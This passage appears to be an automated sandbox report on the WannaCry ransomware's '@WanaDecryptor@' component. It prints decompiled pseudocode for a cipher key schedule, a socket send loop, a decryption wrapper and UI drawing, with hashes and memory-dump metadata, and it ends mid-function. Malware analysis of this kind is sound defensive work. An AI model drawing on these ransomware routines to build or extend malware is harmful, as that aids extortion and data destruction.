                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateSize_local_unwind2
                                                      • String ID:
                                                      • API String ID: 1039228802-0
                                                      • Opcode ID: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                                      • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                                      • Opcode Fuzzy Hash: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                                      • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040A150(void* __ecx) {
                                                      				void* _t170;
                                                      				void* _t177;
                                                      				unsigned int _t178;
                                                      				intOrPtr _t182;
                                                      				signed int _t189;
                                                      				signed int _t190;
                                                      				signed int _t192;
                                                      				signed int* _t198;
                                                      				signed int* _t203;
                                                      				signed int _t214;
                                                      				signed int* _t215;
                                                      				signed int _t224;
                                                      				void* _t236;
                                                      				unsigned int _t238;
                                                      				signed int _t239;
                                                      				signed int _t245;
                                                      				signed int _t251;
                                                      				void* _t268;
                                                      				void* _t275;
                                                      				signed int _t276;
                                                      				void* _t278;
                                                      				signed int _t290;
                                                      				int _t292;
                                                      				signed int _t293;
                                                      				signed int _t317;
                                                      				signed int _t321;
                                                      				signed int _t337;
                                                      				signed int _t353;
                                                      				signed int _t355;
                                                      				intOrPtr* _t375;
                                                      				signed int _t378;
                                                      				void* _t385;
                                                      				void* _t386;
                                                      				void* _t387;
                                                      				signed int _t388;
                                                      				signed int* _t390;
                                                      				void* _t391;
                                                      				void* _t392;
                                                      				signed int _t395;
                                                      				signed int* _t397;
                                                      				intOrPtr _t398;
                                                      				void* _t399;
                                                      				void* _t403;
                                                      
                                                      				_t236 = __ecx;
                                                      				if( *((intOrPtr*)(_t399 + 4)) == 0) {
                                                      					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_push(0x41c9c0);
                                                      					_push(_t399 + 8);
                                                      					L004130FC();
                                                      				}
                                                      				_t170 =  *(_t399 + 0x20);
                                                      				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
                                                      					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_t170 = _t399 + 8;
                                                      					_push(0x41c9c0);
                                                      					_push(_t170);
                                                      					L004130FC();
                                                      				}
                                                      				_t238 =  *(_t399 + 0x24);
                                                      				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
                                                      					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
                                                      					_t238 = _t399 + 0xc;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_push(0x41c9c0);
                                                      					_push(_t399 + 8);
                                                      					L004130FC();
                                                      				}
                                                      				 *(_t236 + 0x3c8) = _t170;
                                                      				 *(_t236 + 0x3cc) = _t238;
                                                      				_t290 = _t238;
                                                      				_t385 =  *(_t399 + 0x20);
                                                      				_t19 = _t236 + 0x3d0; // 0x424
                                                      				_t239 = _t238 >> 2;
                                                      				memcpy(_t19, _t385, _t239 << 2);
                                                      				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
                                                      				_t22 = _t236 + 0x3f0; // 0x444
                                                      				_t245 =  *(_t236 + 0x3cc) >> 2;
                                                      				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
                                                      				_t403 = _t399 + 0x30;
                                                      				_t177 =  *(_t236 + 0x3c8);
                                                      				if(_t177 == 0x10) {
                                                      					_t178 =  *(_t236 + 0x3cc);
                                                      					if(_t178 != 0x10) {
                                                      						asm("sbb eax, eax");
                                                      						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
                                                      					} else {
                                                      						_t182 = 0xa;
                                                      					}
                                                      					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
                                                      				} else {
                                                      					if(_t177 == 0x18) {
                                                      						asm("sbb ecx, ecx");
                                                      						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
                                                      					}
                                                      				}
                                                      				asm("cdq");
                                                      				_t292 = 0;
                                                      				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
                                                      				 *(_t403 + 0x2c) = _t251;
                                                      				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                                      					L23:
                                                      					_t293 = 0;
                                                      					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                                      						L28:
                                                      						_t44 = _t236 + 0x414; // 0x468
                                                      						_t387 = _t44;
                                                      						asm("cdq");
                                                      						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
                                                      						 *(_t403 + 0x30) = _t353;
                                                      						_t189 =  *(_t403 + 0x24);
                                                      						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
                                                      						 *(_t403 + 0x10) = _t395;
                                                      						if(_t395 <= 0) {
                                                      							L31:
                                                      							_t388 = 0;
                                                      							if(_t395 <= 0) {
                                                      								L35:
                                                      								if(_t388 >= _t353) {
                                                      									L51:
                                                      									_t190 = 1;
                                                      									 *(_t403 + 0x30) = 1;
                                                      									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
                                                      										L58:
                                                      										 *((char*)(_t236 + 4)) = 1;
                                                      										return _t190;
                                                      									}
                                                      									_t151 = _t236 + 0x208; // 0x25c
                                                      									_t397 = _t151;
                                                      									do {
                                                      										if(_t251 <= 0) {
                                                      											goto L57;
                                                      										}
                                                      										_t390 = _t397;
                                                      										_t355 = _t251;
                                                      										do {
                                                      											_t192 =  *_t390;
                                                      											 *(_t403 + 0x24) = _t192;
                                                      											_t390 =  &(_t390[1]);
                                                      											_t355 = _t355 - 1;
                                                      											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
                                                      										} while (_t355 != 0);
                                                      										_t251 =  *(_t403 + 0x2c);
                                                      										L57:
                                                      										_t190 =  *(_t403 + 0x30) + 1;
                                                      										_t397 =  &(_t397[8]);
                                                      										 *(_t403 + 0x30) = _t190;
                                                      									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
                                                      									goto L58;
                                                      								}
                                                      								 *(_t403 + 0x28) = 0x41a1b0;
                                                      								do {
                                                      									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
                                                      									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                                      									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
                                                      									if(_t395 == 8) {
                                                      										_t104 = _t236 + 0x418; // 0x46c
                                                      										_t198 = _t104;
                                                      										_t268 = 3;
                                                      										do {
                                                      											 *_t198 =  *_t198 ^  *(_t198 - 4);
                                                      											_t198 =  &(_t198[1]);
                                                      											_t268 = _t268 - 1;
                                                      										} while (_t268 != 0);
                                                      										 *(_t403 + 0x24) =  *(_t236 + 0x420);
                                                      										_t275 = 3;
                                                      										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                                      										_t116 = _t236 + 0x428; // 0x47c
                                                      										_t203 = _t116;
                                                      										do {
                                                      											 *_t203 =  *_t203 ^  *(_t203 - 4);
                                                      											_t203 =  &(_t203[1]);
                                                      											_t275 = _t275 - 1;
                                                      										} while (_t275 != 0);
                                                      										L46:
                                                      										 *(_t403 + 0x24) = 0;
                                                      										if(_t395 <= 0) {
                                                      											goto L50;
                                                      										}
                                                      										_t119 = _t236 + 0x414; // 0x468
                                                      										_t375 = _t119;
                                                      										while(1) {
                                                      											_t251 =  *(_t403 + 0x2c);
                                                      											if(_t388 >=  *(_t403 + 0x30)) {
                                                      												goto L51;
                                                      											}
                                                      											_t398 =  *_t375;
                                                      											asm("cdq");
                                                      											_t375 = _t375 + 4;
                                                      											_t276 = _t388 / _t251;
                                                      											asm("cdq");
                                                      											_t317 = _t388 %  *(_t403 + 0x2c);
                                                      											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
                                                      											_t395 =  *(_t403 + 0x10);
                                                      											_t214 =  *(_t403 + 0x24) + 1;
                                                      											_t388 = _t388 + 1;
                                                      											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
                                                      											 *(_t403 + 0x24) = _t214;
                                                      											if(_t214 < _t395) {
                                                      												continue;
                                                      											}
                                                      											goto L50;
                                                      										}
                                                      										goto L51;
                                                      									}
                                                      									if(_t395 <= 1) {
                                                      										goto L46;
                                                      									}
                                                      									_t101 = _t236 + 0x418; // 0x46c
                                                      									_t215 = _t101;
                                                      									_t278 = _t395 - 1;
                                                      									do {
                                                      										 *_t215 =  *_t215 ^  *(_t215 - 4);
                                                      										_t215 =  &(_t215[1]);
                                                      										_t278 = _t278 - 1;
                                                      									} while (_t278 != 0);
                                                      									goto L46;
                                                      									L50:
                                                      									_t251 =  *(_t403 + 0x2c);
                                                      								} while (_t388 <  *(_t403 + 0x30));
                                                      								goto L51;
                                                      							}
                                                      							_t58 = _t236 + 0x414; // 0x468
                                                      							 *(_t403 + 0x24) = _t58;
                                                      							while(_t388 < _t353) {
                                                      								asm("cdq");
                                                      								_t378 = _t388 / _t251;
                                                      								asm("cdq");
                                                      								_t321 = _t388 % _t251;
                                                      								 *(_t403 + 0x28) = _t321;
                                                      								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
                                                      								_t388 = _t388 + 1;
                                                      								_t224 =  *(_t403 + 0x24);
                                                      								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
                                                      								_t353 =  *(_t403 + 0x30);
                                                      								 *(_t403 + 0x24) = _t224 + 4;
                                                      								if(_t388 < _t395) {
                                                      									continue;
                                                      								}
                                                      								goto L35;
                                                      							}
                                                      							goto L51;
                                                      						}
                                                      						 *(_t403 + 0x24) = _t395;
                                                      						do {
                                                      							_t387 = _t387 + 4;
                                                      							 *(_t387 - 4) = 0 << 0x18;
                                                      							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
                                                      							_t189 = _t189 + 4;
                                                      							_t337 =  *(_t403 + 0x24) - 1;
                                                      							 *(_t403 + 0x24) = _t337;
                                                      						} while (_t337 != 0);
                                                      						goto L31;
                                                      					}
                                                      					_t38 = _t236 + 0x1e8; // 0x23c
                                                      					_t391 = _t38;
                                                      					do {
                                                      						if(_t251 > 0) {
                                                      							memset(_t391, 0, _t251 << 2);
                                                      							_t403 = _t403 + 0xc;
                                                      							_t251 =  *(_t403 + 0x2c);
                                                      						}
                                                      						_t293 = _t293 + 1;
                                                      						_t391 = _t391 + 0x20;
                                                      					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
                                                      					goto L28;
                                                      				} else {
                                                      					_t33 = _t236 + 8; // 0x5c
                                                      					_t392 = _t33;
                                                      					do {
                                                      						if(_t251 > 0) {
                                                      							memset(_t392, 0, _t251 << 2);
                                                      							_t403 = _t403 + 0xc;
                                                      							_t251 =  *(_t403 + 0x2c);
                                                      						}
                                                      						_t292 = _t292 + 1;
                                                      						_t392 = _t392 + 0x20;
                                                      					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
                                                      					goto L23;
                                                      				}
                                                      			}

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                                      • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                                      • Opcode Fuzzy Hash: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                                      • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                      				void _v1024;
                                                      				char _v1028;
                                                      				intOrPtr _v1032;
                                                      				intOrPtr _v1036;
                                                      				void* _v1040;
                                                      				intOrPtr _v1044;
                                                      				char _v1048;
                                                      				signed int _t34;
                                                      				void* _t36;
                                                      				intOrPtr _t37;
                                                      				void* _t43;
                                                      				void* _t45;
                                                      				intOrPtr _t46;
                                                      				void* _t49;
                                                      				signed int _t58;
                                                      				intOrPtr* _t60;
                                                      				signed int _t70;
                                                      				signed int _t71;
                                                      				signed int _t78;
                                                      				void* _t83;
                                                      				void* _t91;
                                                      				void* _t102;
                                                      				void* _t103;
                                                      				void* _t104;
                                                      				void* _t105;
                                                      				void** _t107;
                                                      				void** _t109;
                                                      
                                                      				_t106 =  &_v1040;
                                                      				_t105 = _a8;
                                                      				_t60 = __ecx;
                                                      				_v1032 = 0;
                                                      				if(_t105 != 0) {
                                                      					_t34 = E0040D5D0(__ecx);
                                                      					__eflags = _t34;
                                                      					if(_t34 != 0) {
                                                      						__eflags = _a12;
                                                      						if(_a12 == 0) {
                                                      							_t36 = _a4;
                                                      							_v1040 = _t36;
                                                      							_t91 = _t36;
                                                      							goto L13;
                                                      						} else {
                                                      							__eflags = _a16;
                                                      							if(_a16 != 0) {
                                                      								__eflags = _t105 - 0x400;
                                                      								if(_t105 > 0x400) {
                                                      									_t49 = E00412A90(_t105);
                                                      									_t109 =  &(( &_v1040)[1]);
                                                      									_v1040 = _t49;
                                                      									__eflags = _t49;
                                                      									if(_t49 != 0) {
                                                      										_t103 = _a4;
                                                      										_t70 = _t105;
                                                      										_t71 = _t70 >> 2;
                                                      										memcpy(_t49, _t103, _t71 << 2);
                                                      										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
                                                      										_t106 =  &(_t109[6]);
                                                      										_t91 = _v1040;
                                                      										E0040D2B0(_t60, _t91, _t105);
                                                      										goto L13;
                                                      									} else {
                                                      										return _t49;
                                                      									}
                                                      								} else {
                                                      									_t104 = _a4;
                                                      									_t78 = _t105 >> 2;
                                                      									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
                                                      									_t106 =  &(( &_v1040)[6]);
                                                      									_t83 =  &_v1024;
                                                      									_t91 = _t83;
                                                      									_v1040 = _t83;
                                                      									E0040D2B0(_t60, _t91, _t105);
                                                      									goto L13;
                                                      								}
                                                      							} else {
                                                      								_t91 = _a4;
                                                      								E0040D2B0(__ecx, _t91, _t105);
                                                      								L13:
                                                      								_push( &_v1028);
                                                      								L0041303E();
                                                      								_t37 = _v1028;
                                                      								_t107 =  &(_t106[1]);
                                                      								_t102 = 0;
                                                      								_v1036 = _t37;
                                                      								__eflags = _t105;
                                                      								if(_t105 > 0) {
                                                      									while(1) {
                                                      										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
                                                      										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
                                                      											goto L25;
                                                      										}
                                                      										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
                                                      										__eflags = _t43;
                                                      										if(__eflags > 0) {
                                                      											_t102 = _t102 + _t43;
                                                      											__eflags = _t102;
                                                      											_push( &_v1048);
                                                      											goto L24;
                                                      										} else {
                                                      											if(__eflags != 0) {
                                                      												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
                                                      												__eflags = _t45 - 0x2733;
                                                      												if(_t45 == 0x2733) {
                                                      													_t46 = _v1044;
                                                      													__eflags = _t46 - 0x64;
                                                      													_v1044 = _t46 + 1;
                                                      													if(_t46 > 0x64) {
                                                      														Sleep(0x64);
                                                      														_v1044 = 0;
                                                      													}
                                                      													_push( &_v1048);
                                                      													L24:
                                                      													L0041303E();
                                                      													_t107 =  &(_t107[1]);
                                                      													__eflags = _t102 - _t105;
                                                      													if(_t102 < _t105) {
                                                      														_t37 = _v1048;
                                                      														continue;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L25;
                                                      									}
                                                      								}
                                                      								L25:
                                                      								__eflags = _t91 - _a4;
                                                      								if(_t91 != _a4) {
                                                      									__eflags = _t91 -  &_v1024;
                                                      									if(_t91 !=  &_v1024) {
                                                      										__eflags = _t91;
                                                      										if(_t91 != 0) {
                                                      											free(_t91);
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t102;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t58 = _t34 | 0xffffffff;
                                                      						__eflags = _t58;
                                                      						return _t58;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}































                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                                      • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404AF0(void* __ecx, void* _a4, int _a8) {
                                                      				intOrPtr* _v4;
                                                      				void* _v8;
                                                      				signed int _v12;
                                                      				int _t12;
                                                      				void* _t19;
                                                      				signed int _t22;
                                                      				signed int _t23;
                                                      				struct _CRITICAL_SECTION* _t30;
                                                      				void* _t36;
                                                      
                                                      				_t19 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 8)) != 0) {
                                                      					_t2 = _t19 + 0x10; // 0x14
                                                      					_t30 = _t2;
                                                      					EnterCriticalSection(_t30);
                                                      					_t36 = _a4;
                                                      					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
                                                      					_push(_t30);
                                                      					if(_t12 != 0) {
                                                      						LeaveCriticalSection();
                                                      						_t22 = _v12;
                                                      						_t23 = _t22 >> 2;
                                                      						memcpy(_v8, _t36, _t23 << 2);
                                                      						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
                                                      						return 1;
                                                      					} else {
                                                      						LeaveCriticalSection();
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}













                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                                      • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CryptDecryptEnterLeave
                                                      • String ID:
                                                      • API String ID: 1395129968-0
                                                      • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                                      • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004090F0(intOrPtr* __ecx, void* __fp0) {
                                                      				signed int _t226;
                                                      				signed int _t230;
                                                      				struct tagPOINT _t232;
                                                      				long _t233;
                                                      				signed int _t237;
                                                      				signed int _t242;
                                                      				intOrPtr _t246;
                                                      				intOrPtr* _t264;
                                                      				signed int _t269;
                                                      				signed int _t270;
                                                      				signed int _t271;
                                                      				signed int _t272;
                                                      				signed int _t276;
                                                      				intOrPtr _t279;
                                                      				signed int _t282;
                                                      				intOrPtr* _t283;
                                                      				struct tagPOINT _t295;
                                                      				signed int _t311;
                                                      				signed int _t314;
                                                      				signed int** _t321;
                                                      				intOrPtr _t361;
                                                      				intOrPtr _t418;
                                                      				intOrPtr* _t429;
                                                      				signed int* _t433;
                                                      				long _t437;
                                                      				signed int _t438;
                                                      				intOrPtr* _t440;
                                                      				signed int _t441;
                                                      				intOrPtr _t442;
                                                      				void* _t443;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041414D);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t442;
                                                      				_t443 = _t442 - 0xc4;
                                                      				_t321 =  *(_t443 + 0xd8);
                                                      				_t226 = _t321[1];
                                                      				_t429 = __ecx;
                                                      				if((_t226 & 0x00000003) == 0) {
                                                      					L49:
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
                                                      					return _t226;
                                                      				}
                                                      				_t433 =  *_t321;
                                                      				 *(_t443 + 0x40) = _t226 & 0x00000004;
                                                      				 *(_t443 + 0x10) = 0;
                                                      				L00412DA6();
                                                      				_push(_t443 + 0x14);
                                                      				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
                                                      				L00412DD6();
                                                      				_t230 = _t321[1] & 0x00000300;
                                                      				if(_t230 == 0x100) {
                                                      					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                                      						_push("%d%%");
                                                      						L00412DA0();
                                                      					}
                                                      					_t232 = _t321[7];
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
                                                      					asm("fild dword [esp+0x28]");
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
                                                      					asm("fidiv dword [esp+0x28]");
                                                      					L0041304A();
                                                      					 *(_t443 + 0x10) = _t232;
                                                      				} else {
                                                      					if(_t230 == 0x200) {
                                                      						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                                      							_push("%d");
                                                      							L00412DA0();
                                                      						}
                                                      						 *(_t443 + 0x10) = _t321[6];
                                                      					}
                                                      				}
                                                      				_t226 =  *(_t443 + 0x14);
                                                      				if( *((intOrPtr*)(_t226 - 8)) == 0) {
                                                      					L48:
                                                      					 *(_t443 + 0xdc) = 0xffffffff;
                                                      					L00412CC2();
                                                      					goto L49;
                                                      				} else {
                                                      					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
                                                      					L00412DE2();
                                                      					_t437 = _t233;
                                                      					 *(_t443 + 0x54) = _t433;
                                                      					 *(_t443 + 0x50) = 0x416794;
                                                      					 *(_t443 + 0xdc) = 1;
                                                      					E00409DF0(_t443 + 0x58);
                                                      					 *(_t443 + 0x58) = 0x416780;
                                                      					 *((char*)(_t443 + 0xe0)) = 2;
                                                      					 *(_t443 + 0x64) = 0;
                                                      					 *(_t443 + 0x54) = 0x41677c;
                                                      					E00409870(_t443 + 0x54, _t437);
                                                      					 *(_t443 + 0x68) = _t433;
                                                      					 *((char*)(_t443 + 0xe0)) = 4;
                                                      					 *(_t443 + 0x70) = 0xffffffff;
                                                      					 *(_t443 + 0x68) = 0x416778;
                                                      					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
                                                      					 *(_t443 + 0x90) = _t237;
                                                      					 *(_t443 + 0x6c) = _t237;
                                                      					 *(_t443 + 0x88) = _t433;
                                                      					_push(1);
                                                      					 *((char*)(_t443 + 0xe0)) = 6;
                                                      					 *(_t443 + 0x90) = 0;
                                                      					 *(_t443 + 0x88) = 0x416774;
                                                      					L00412DC4();
                                                      					 *(_t443 + 0x70) = _t237;
                                                      					 *(_t443 + 0x8c) = _t237;
                                                      					 *(_t443 + 0x7c) = _t433;
                                                      					_push(0xe);
                                                      					 *((char*)(_t443 + 0xe0)) = 8;
                                                      					 *(_t443 + 0x84) = 0xffffffff;
                                                      					 *(_t443 + 0x7c) = 0x416770;
                                                      					L00413004();
                                                      					 *(_t443 + 0x74) = _t237;
                                                      					 *(_t443 + 0x80) = _t237;
                                                      					 *((char*)(_t443 + 0xe4)) = 9;
                                                      					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
                                                      					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
                                                      					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
                                                      					L00412DA6();
                                                      					_push( *(_t443 + 0x10));
                                                      					_push( *(_t443 + 0x14));
                                                      					_push(_t443 + 0x1c);
                                                      					 *((char*)(_t443 + 0xe8)) = 0xa;
                                                      					L00412E00();
                                                      					_t443 = _t443 + 0xc;
                                                      					_t242 = 0;
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = 0;
                                                      					if(_t437 != 0) {
                                                      						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
                                                      						_t242 = 0;
                                                      						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
                                                      					}
                                                      					 *(_t443 + 0x10) = _t242;
                                                      					 *(_t443 + 0x2c) = _t242;
                                                      					 *(_t443 + 0x24) = _t242;
                                                      					_t438 = 0;
                                                      					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
                                                      					_t246 =  *((intOrPtr*)(_t443 + 0x28));
                                                      					if(_t246 != 0) {
                                                      						if(_t246 != 0x5a) {
                                                      							if(_t246 != 0xb4) {
                                                      								if(_t246 != 0x10e) {
                                                      									goto L21;
                                                      								}
                                                      								_t441 =  *(_t443 + 0x20);
                                                      								 *(_t443 + 0x10) = _t441;
                                                      								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                                      								_t438 =  ~_t441;
                                                      								L20:
